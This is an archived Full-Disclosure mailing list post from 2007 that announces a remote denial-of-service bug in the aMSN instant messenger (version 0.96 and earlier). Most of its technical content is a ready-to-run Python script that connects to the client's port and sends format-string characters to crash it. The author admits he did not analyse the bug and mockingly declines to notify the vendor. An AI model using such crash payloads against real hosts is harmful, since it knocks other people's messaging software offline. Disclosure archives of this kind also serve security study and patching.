lists.openwall.net | lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC | |
Open Source and information security mailing list archives
| ||
|
Date: Sat, 21 Apr 2007 04:35:28 +0200 From: Levent Kayan <levent@...ehack.org> To: full-disclosure@...ts.grok.org.uk Subject: aMSN <= 0.96 remote DoS vulnerability /* * bug: amsn remote DoS vulnerability * affected version: <= 0.96 * site: http://amsn-project.net/ * tested: amsn-0.96 on freebsd 6.2 * * author: levent kayan * date: Tue Mar 27 16:04:51 CEST 2007 * www.corehack.org */ /* Introduction */ amsn is a free open source MSN Messenger clone. /* Technical details */ During fuzzing some instant-messaging applications, I found a basic bug in amsn. I just sent some characters to that amsn port and noticed that it has reported an error and was killed. I didn't analyse the bug though. Maybe you're interested in doing so. :P The following python script is enough to produce a DoS attack and kill the client: ---fuck off here--- import socket HOST = 'victim.com' PORT = 31337 s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) s.connect((HOST, PORT)) i = 1 while i <= 3: s.send('abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ1234567890\ °!"§$%&/()=?`#+#-.,;:_ÄÖÜäöü%X%X%X%X%X%XXX%X%x%x%x%x%x%x%x%x%x%n%n%n\ %n%n%n%n%n%n\³²¹³#²[{#³]²#\`~··') ---fuck off here--- I think it were the character '}', '{' or '%x', '%n'. Try to determine this for yourself! Don't bug me with this shit. /* Vendor contacted? */ NO! Why should I contact them? :) lol, go away and contact them yourself. /* EOF */ -- Name: Levent Kayan E-Mail: levent@...ehack.org GPG key: 0xd6794965 Key fingerprint: FD20 03C3 DD7F 51BB 224F F11E 0855 23C8 D679 4965 Website: http://www.corehack.org/ _______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Powered by blists - more mailing lists